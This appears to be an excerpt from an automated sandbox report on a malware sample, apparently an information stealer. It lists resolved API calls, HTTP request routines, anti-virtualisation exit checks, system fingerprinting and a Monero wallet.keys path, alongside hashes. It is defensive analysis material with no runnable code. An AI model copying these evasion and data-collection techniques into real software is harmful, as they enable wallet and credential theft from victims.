                          • LoadLibraryA.KERNEL32(0083EB00,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA03D
                          • LoadLibraryA.KERNEL32(0083ECE0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA04E
                          • LoadLibraryA.KERNEL32(0083EC38,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA060
                          • LoadLibraryA.KERNEL32(0083EBC0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA072
                          • LoadLibraryA.KERNEL32(0083ECB0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA083
                          • LoadLibraryA.KERNEL32(0083ECC8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA095
                          • LoadLibraryA.KERNEL32(0083ECF8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA0A7
                          • LoadLibraryA.KERNEL32(0083EE30,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA0B8
                          • GetProcAddress.KERNEL32(751E0000,00824FA8), ref: 00DFA0DA
                          • GetProcAddress.KERNEL32(751E0000,0083EF50), ref: 00DFA0F2
                          • GetProcAddress.KERNEL32(751E0000,00838B08), ref: 00DFA10A
                          • GetProcAddress.KERNEL32(751E0000,0083EEC0), ref: 00DFA123
                          • GetProcAddress.KERNEL32(751E0000,008251E8), ref: 00DFA13B
                          • GetProcAddress.KERNEL32(700F0000,0082A928), ref: 00DFA160
                          • GetProcAddress.KERNEL32(700F0000,008256E8), ref: 00DFA179
                          • GetProcAddress.KERNEL32(700F0000,0082A450), ref: 00DFA191
                          • GetProcAddress.KERNEL32(700F0000,0083EF68), ref: 00DFA1A9
                          • GetProcAddress.KERNEL32(700F0000,0083EE18), ref: 00DFA1C2
                          • GetProcAddress.KERNEL32(700F0000,008256C8), ref: 00DFA1DA
                          • GetProcAddress.KERNEL32(700F0000,008253E8), ref: 00DFA1F2
                          • GetProcAddress.KERNEL32(700F0000,0083EED8), ref: 00DFA20B
                          • GetProcAddress.KERNEL32(753A0000,00825608), ref: 00DFA22C
                          • GetProcAddress.KERNEL32(753A0000,008253C8), ref: 00DFA244
                          • GetProcAddress.KERNEL32(753A0000,0083EEF0), ref: 00DFA25D
                          • GetProcAddress.KERNEL32(753A0000,0083EEA8), ref: 00DFA275
                          • GetProcAddress.KERNEL32(753A0000,00825408), ref: 00DFA28D
                          • GetProcAddress.KERNEL32(76310000,0082A7C0), ref: 00DFA2B3
                          • GetProcAddress.KERNEL32(76310000,0082A540), ref: 00DFA2CB
                          • GetProcAddress.KERNEL32(76310000,0083EE48), ref: 00DFA2E3
                          • GetProcAddress.KERNEL32(76310000,008253A8), ref: 00DFA2FC
                          • GetProcAddress.KERNEL32(76310000,00825428), ref: 00DFA314
                          • GetProcAddress.KERNEL32(76310000,0082A720), ref: 00DFA32C
                          • GetProcAddress.KERNEL32(76910000,0083EF98), ref: 00DFA352
                          • GetProcAddress.KERNEL32(76910000,00825468), ref: 00DFA36A
                          • GetProcAddress.KERNEL32(76910000,00838B48), ref: 00DFA382
                          • GetProcAddress.KERNEL32(76910000,0083EE60), ref: 00DFA39B
                          • GetProcAddress.KERNEL32(76910000,0083EE78), ref: 00DFA3B3
                          • GetProcAddress.KERNEL32(76910000,00825528), ref: 00DFA3CB
                          • GetProcAddress.KERNEL32(76910000,00825388), ref: 00DFA3E4
                          • GetProcAddress.KERNEL32(76910000,0083EF08), ref: 00DFA3FC
                          • GetProcAddress.KERNEL32(76910000,0083EF20), ref: 00DFA414
                          • GetProcAddress.KERNEL32(75B30000,00825448), ref: 00DFA436
                          • GetProcAddress.KERNEL32(75B30000,0083EE90), ref: 00DFA44E
                          • GetProcAddress.KERNEL32(75B30000,0083EF80), ref: 00DFA466
                          • GetProcAddress.KERNEL32(75B30000,0083EF38), ref: 00DFA47F
                          • GetProcAddress.KERNEL32(75B30000,0083EFB0), ref: 00DFA497
                          • GetProcAddress.KERNEL32(75670000,00825488), ref: 00DFA4B8
                          • GetProcAddress.KERNEL32(75670000,00825688), ref: 00DFA4D1
                          • GetProcAddress.KERNEL32(76AC0000,008254A8), ref: 00DFA4F2
                          • GetProcAddress.KERNEL32(76AC0000,0083EE00), ref: 00DFA50A
                          • GetProcAddress.KERNEL32(6F4E0000,008254C8), ref: 00DFA530
                          • GetProcAddress.KERNEL32(6F4E0000,00825628), ref: 00DFA548
                          • GetProcAddress.KERNEL32(6F4E0000,008255C8), ref: 00DFA560
                          • GetProcAddress.KERNEL32(6F4E0000,0083E8C0), ref: 00DFA579
                          • GetProcAddress.KERNEL32(6F4E0000,008255E8), ref: 00DFA591
                          • GetProcAddress.KERNEL32(6F4E0000,008254E8), ref: 00DFA5A9
                          • GetProcAddress.KERNEL32(6F4E0000,00825508), ref: 00DFA5C2
                          • GetProcAddress.KERNEL32(6F4E0000,008255A8), ref: 00DFA5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00DFA5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00DFA607
                          • GetProcAddress.KERNEL32(75AE0000,0083EA10), ref: 00DFA629
                          • GetProcAddress.KERNEL32(75AE0000,00838B18), ref: 00DFA641
                          • GetProcAddress.KERNEL32(75AE0000,0083EAD0), ref: 00DFA659
                          • GetProcAddress.KERNEL32(75AE0000,0083EA28), ref: 00DFA672
                          • GetProcAddress.KERNEL32(76300000,00825648), ref: 00DFA693
                          • GetProcAddress.KERNEL32(6FE20000,0083EAE8), ref: 00DFA6B4
                          • GetProcAddress.KERNEL32(6FE20000,00825348), ref: 00DFA6CD
                          • GetProcAddress.KERNEL32(6FE20000,0083E968), ref: 00DFA6E5
                          • GetProcAddress.KERNEL32(6FE20000,0083E9E0), ref: 00DFA6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 8e9e0743910a3d33717a23bdabf3c96daf14cdd263b32ed0241b2c60cccd9770
                          • Instruction ID: 1c1396881dc5a29f1796552c325ceb53f4bb05f02d59090231888332d3f92d02
                          • Opcode Fuzzy Hash: 8e9e0743910a3d33717a23bdabf3c96daf14cdd263b32ed0241b2c60cccd9770
                          • Instruction Fuzzy Hash: 4062EBB5700200EFC774DFA8EA8895637F9F78C601734856AE68AC3A4CDE7F94419B64

                          Control-flow Graph (function at 0xde6280; legend: Executed / Not Executed; graph node and edge data not reproduced)
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                            • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                          • StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00DE63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE646D
                          • InternetCloseHandle.WININET(00000000), ref: 00DE64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00DE64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00DE6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 5dbca39a9fa2713259220d54424f2716dda93f29b04b5490c9a32137f210105f
                          • Instruction ID: c4e25dc5e626ccaaeef8ee908d7d73391957562af22dd71b523369095b4d0dfc
                          • Opcode Fuzzy Hash: 5dbca39a9fa2713259220d54424f2716dda93f29b04b5490c9a32137f210105f
                          • Instruction Fuzzy Hash: D0715C71A00218EBDB24EFA4CC49BEE7774FB44700F108199F20A6B5C4DBB5AA85CF61

                          Control-flow Graph (function at 0xdf5510; legend: Executed / Not Executed; graph node and edge data not reproduced)
                          APIs
                            • Part of subcall function 00DFA820: lstrlen.KERNEL32(00DE4F05,?,?,00DE4F05,00E00DDE), ref: 00DFA82B
                            • Part of subcall function 00DFA820: lstrcpy.KERNEL32(00E00DDE,00000000), ref: 00DFA885
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF56A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5857
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5228
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5318
                            • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF532F
                            • Part of subcall function 00DF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00DF5364
                            • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF5383
                            • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF53AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00DF5A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: b712b122a781439edc6029e59d3e38e020eb6bc23938944723ff429ef7620f2c
                          • Instruction ID: 79af92956f0381449e2139ff272c78e3fc5ff461b28310a9926fea7baac6b2a0
                          • Opcode Fuzzy Hash: b712b122a781439edc6029e59d3e38e020eb6bc23938944723ff429ef7620f2c
                          • Instruction Fuzzy Hash: 73E152B1A1020C9ACB14FBA4E852EFD7378EF54340F51C118B64A67495EF75AB09CBB2

                          Control-flow Graph (function at 0xdf17a0; legend: Executed / Not Executed; graph node and edge data not reproduced)
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00DF17C5
                          • ExitProcess.KERNEL32 ref: 00DF17D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 84bc075d284ee0420306058730858058f0ff348d526df65b4e1f1408536975b6
                          • Instruction ID: 5b8a325d576877e94ab6bc33fe6af0b27c7cb99fa575ba624164c904f17d17c1
                          • Opcode Fuzzy Hash: 84bc075d284ee0420306058730858058f0ff348d526df65b4e1f1408536975b6
                          • Instruction Fuzzy Hash: DA5168B8A0020EEBCB14DFA0D994BBE77B5BF44304F118048E656A7280DBB5E941DBB1

                          Control-flow Graph

                          Control-flow graph (rendered graph not recoverable; executed/not-executed block colouring lost): basic blocks df7500-df768e; API calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA; internal subcalls df8d00, dfa740.
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DF7542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DF757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF760A
                          • wsprintfA.USER32 ref: 00DF7640
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$
                          • API String ID: 1544550907-3109660283
                          • Opcode ID: 7d4365eeb78933c8df5f8a52d880a949324614c7aa3465016a80854f3f623f26
                          • Instruction ID: cdabdd32e80fdc169ca3c38babd1a08124cef8cf971b5f57c8e4d8ff896cfc50
                          • Opcode Fuzzy Hash: 7d4365eeb78933c8df5f8a52d880a949324614c7aa3465016a80854f3f623f26
                          • Instruction Fuzzy Hash: 3A4161B1904248EBDB20DF94DC45BEEB7B4EF08704F144199F609A7284DB79AA44CBB5

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831650), ref: 00DF98A1
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831638), ref: 00DF98BA
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831668), ref: 00DF98D2
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831698), ref: 00DF98EA
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831728), ref: 00DF9903
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00838C48), ref: 00DF991B
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008250A8), ref: 00DF9933
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008250E8), ref: 00DF994C
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008316B0), ref: 00DF9964
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008316C8), ref: 00DF997C
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831740), ref: 00DF9995
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00831758), ref: 00DF99AD
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,00825068), ref: 00DF99C5
                            • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(76210000,008316E0), ref: 00DF99DE
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DE11D0: ExitProcess.KERNEL32 ref: 00DE1211
                            • Part of subcall function 00DE1160: GetSystemInfo.KERNEL32(?), ref: 00DE116A
                            • Part of subcall function 00DE1160: ExitProcess.KERNEL32 ref: 00DE117E
                            • Part of subcall function 00DE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
                            • Part of subcall function 00DE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
                            • Part of subcall function 00DE1110: ExitProcess.KERNEL32 ref: 00DE1143
                            • Part of subcall function 00DE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DE123E
                            • Part of subcall function 00DE1220: __aulldiv.LIBCMT ref: 00DE1258
                            • Part of subcall function 00DE1220: __aulldiv.LIBCMT ref: 00DE1266
                            • Part of subcall function 00DE1220: ExitProcess.KERNEL32 ref: 00DE1294
                            • Part of subcall function 00DF6770: GetUserDefaultLangID.KERNEL32 ref: 00DF6774
                            • Part of subcall function 00DE1190: ExitProcess.KERNEL32 ref: 00DE11C6
                            • Part of subcall function 00DF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                            • Part of subcall function 00DF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                            • Part of subcall function 00DF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                            • Part of subcall function 00DF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                            • Part of subcall function 00DF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                            • Part of subcall function 00DF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00838AE8,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00DF6AF9
                          • Sleep.KERNEL32(00001770), ref: 00DF6B04
                          • CloseHandle.KERNEL32(?,00000000,?,00838AE8,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6B1A
                          • ExitProcess.KERNEL32 ref: 00DF6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 5b4e27818a69aa005a35e791c877479305493ca5731c881276e699cbdef3d54d
                          • Instruction ID: 0a1bc0551e240922864c0483e7bac509a0741df9ddf694739a3975680913dea2
                          • Opcode Fuzzy Hash: 5b4e27818a69aa005a35e791c877479305493ca5731c881276e699cbdef3d54d
                          • Instruction Fuzzy Hash: 33311AB0A0020CAADB14FBE4D856BFE7738EF04340F558528F746A6585DFB46A05CBB6

                          Control-flow Graph

                          Control-flow graph (rendered graph not recoverable; executed/not-executed block colouring lost): basic blocks de1220-de129d; API calls GlobalMemoryStatusEx, ExitProcess; internal subcalls df89b0, dfda00.
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DE123E
                          • __aulldiv.LIBCMT ref: 00DE1258
                          • __aulldiv.LIBCMT ref: 00DE1266
                          • ExitProcess.KERNEL32 ref: 00DE1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: 7429e0d3aa74132e123e3a07f82effc272f9099ac3c898946abd461a3c0efebc
                          • Instruction ID: 52d2796ee8b1e690762d989eaecef1d1e16b0a8596825505437dc55bbd92c06a
                          • Opcode Fuzzy Hash: 7429e0d3aa74132e123e3a07f82effc272f9099ac3c898946abd461a3c0efebc
                          • Instruction Fuzzy Hash: 4E014FB4A40348EADB10EBD5CC4ABADB778EB14701F248044E705B6180D6745545876D

                          Control-flow Graph

                          Control-flow graph (rendered graph not recoverable; executed/not-executed block colouring lost): basic blocks df6aba-df6b22; API calls OpenEventA, CreateEventA, CloseHandle, Sleep, ExitProcess; internal subcalls dfaad0, df6920, df5b10.
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00838AE8,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00DF6AF9
                          • Sleep.KERNEL32(00001770), ref: 00DF6B04
                          • CloseHandle.KERNEL32(?,00000000,?,00838AE8,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6B1A
                          • ExitProcess.KERNEL32 ref: 00DF6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
